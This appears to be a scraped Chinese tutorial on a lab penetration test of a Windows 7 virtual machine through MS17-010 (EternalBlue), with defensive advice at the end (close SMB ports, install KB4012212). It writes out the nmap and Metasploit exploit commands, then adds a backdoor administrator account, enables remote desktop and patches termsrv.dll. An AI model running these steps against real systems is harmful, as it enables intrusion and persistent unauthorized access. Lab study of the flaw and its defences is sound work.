![](https://img.51dongshi.com/20250108/wz/18386351252.jpg)
109win7u盤()視頻加載中...win77利用永恒藍(lán)漏洞滲透測(cè)試完整視頻漏洞介紹(Microsoft 安全公告 MS17-010 - 嚴(yán)重等級(jí))https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010此安全更新程序已修復(fù)。 Microsoft Windows 多個(gè)漏洞。若攻擊者向 Windows SMBv1 如果服務(wù)器發(fā)送特殊設(shè)計(jì)信息,最嚴(yán)重的漏洞可能允許遠(yuǎn)程執(zhí)行代碼。測(cè)試環(huán)境KALI LINUX 2020 靶機(jī)VirtualBox(WIN7 旗艦版)靶機(jī)地址:192.168.88.109工具:nmap,metasploit v5.0.73-dev,rdesktop,universal termsrv.dll path1.掃描主機(jī)的開放端口和服務(wù) nmap –sS –sV –Pn 192.168.88.109#Nmap 參數(shù)解釋#-sS 使用SYN半開式掃描,使掃描結(jié)果更加準(zhǔn)確(也稱為半開放,或隱身掃描)#-sV 版本檢測(cè),-檢測(cè)打開的端口以獲取服務(wù)和版本信息#Pn 不判斷目標(biāo)主機(jī)的存活性,直接掃描2.掃描是否有永恒的藍(lán)色漏洞#search ms17_010#use auxiliary/scanner/smb/smb_ms17_010 或者 序號(hào)#set rhosts 192.168.88.109#run3.利用smb_ms17_010漏洞獲得系統(tǒng)管理權(quán)限#search ms_010#use exploit/windows/smb/ms17_010_eternalblue 或者 序號(hào)#set rhosts 192.168.88.109#options 檢查配置是否正常#run下面的界面是成功的提示----win----,出現(xiàn)c:\\windows\\system32即為成功4.創(chuàng)建管理員賬號(hào),打開3389遠(yuǎn)程桌面服務(wù)# 創(chuàng)建用戶名root,密碼為12345的賬戶 net user root 12345 /add#將root賬戶加入到administrators管理員組 net localgroup administrators root /add#開啟3389服務(wù) wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1#連接遠(yuǎn)程桌面 rdesktop -g 1440x900 -P -z -x l -r sound:off 192.168.88.1095.WIN多用戶連接遠(yuǎn)程桌面(1)修改組策略計(jì)算機(jī)配置-管理模板-【W(wǎng)indows組件:【遠(yuǎn)程桌面服務(wù)】-【遠(yuǎn)程桌面會(huì)話主機(jī)】-【連接】-【標(biāo)準(zhǔn)】雙擊【限制連接數(shù)量】將限制鏈接數(shù)修改為2個(gè)以上。計(jì)算機(jī)配置-管理模板-【W(wǎng)indows組件-【遠(yuǎn)程桌面服務(wù)】-【遠(yuǎn)程桌面會(huì)話主機(jī)】-【連接】-【標(biāo)準(zhǔn)】雙擊【將遠(yuǎn)程桌面服務(wù)用戶限制到單獨(dú)的遠(yuǎn)程桌面服務(wù)會(huì)話】,禁止該策略。(2)安裝遠(yuǎn)程桌面多用戶連接限制補(bǔ)丁#下載universal termsrv.dll path補(bǔ)丁,分為X86,X64兩個(gè)版本,根據(jù)系統(tǒng)安裝相應(yīng)版本.6.防范措施(1)打開自帶防火墻的系統(tǒng),關(guān)閉135、137、138、139,445端口(2)安裝相應(yīng)的補(bǔ)丁http://www.catalog.update.microsoft.com/search.aspx?q=KB4012212電腦知識(shí)